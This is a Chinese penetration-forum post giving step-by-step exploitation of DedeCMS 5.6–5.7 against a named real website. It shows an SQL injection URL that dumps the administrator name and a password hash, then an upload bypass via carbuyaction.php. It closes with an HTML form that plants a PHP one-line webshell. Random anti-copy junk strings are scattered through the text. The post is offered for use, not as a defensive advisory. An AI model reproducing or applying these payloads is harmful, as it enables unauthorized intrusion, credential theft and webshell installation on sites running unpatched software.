中国网络渗透测试联盟
标题:
dedecms5.6-5.7注入与上传漏洞利用
[打印本页]
作者:
admin
时间:
2012-9-13 10:56
标题:
dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
% @7 h0 C, J2 ~4 Q$ J% Z" w
这站
http://www.political-security.com/
4 Z1 G' r6 d) W3 w, h0 I2 C! {0 V2 c
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
. ?& z& j2 g ?. R9 r- b8 j
www.political-security.com/data/mysql_error_trace.inc
爆后台
! B- |+ F- F: p+ _; U
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
1 \) N+ f) O# S* C1 E3 b/ [
然后写上语句
! F' Q# N+ A" d2 `* {$ j
查看管理员帐号
1 J0 x1 M* x/ F, I+ S1 A
http://www.political-security.co ... &membergroup=@`
1 ?+ v- A0 M% T, x& ^7 h, c* Z
+ P1 _2 Q+ j$ `9 s5 G* m9 `
admin
: s% H: f6 f6 L+ N) q
2 J* T' s0 k3 x9 {/ M; j7 ]
查看管理员密码
P% \! U% ]9 e# u, ]% g4 x A
http://www.political-security.co ... &membergroup=@`
" W4 y% O! K# ]0 B
# ^# u/ V3 A3 { S! ^! e
8d29b1ef9f8c5a5af429
: i/ b j5 Q* U. t& H, r! r
: w& P0 B6 w6 P
查看管理员密码
6 P- A: C8 e, X# @
6 T) {* ]" D/ n1 _- O
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
; \) N6 \8 T. b& `
0 T4 Z; c! Y5 a" _' y9 w* b) I
8d2
) X! V y9 C) ]; O3 e, Y
9b1ef9f8c5a5af42
' S% Z7 }7 e* A6 R6 `
9
% Y( X& k# r8 R
2 q ~1 ?; M. Q
cmd5没解出来 只好测试第二个方法
7 o* h$ w3 A! m, a% S2 g5 l+ p
% K) N1 O' S0 l
8 @) Q2 C" g5 z* }" |
②上传漏洞:
$ ?! [+ w' Z( t& H) w c, s. V
3 j& \( d4 o4 f' z
只要登陆会员中心,然后访问页面链接
5 Z3 a& c, M) T' \/ C" t4 O
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
* E/ m0 T, |% v1 p* V
+ F7 F9 E' [: c! O( x: c5 o; G2 d0 ^
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
/ \) B+ g ~; r4 o5 v
& O# O6 `" a5 p+ N
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
3 V) G7 c. h1 }6 L; z0 ]. V+ b
, H3 O$ |: v( H, U
<form action="http://
www.political-security.com
/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
4 \8 L' n% G. C% O
或者
! m3 b/ Q6 _) D, N: v% _+ _) |. `
即可上传成功
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2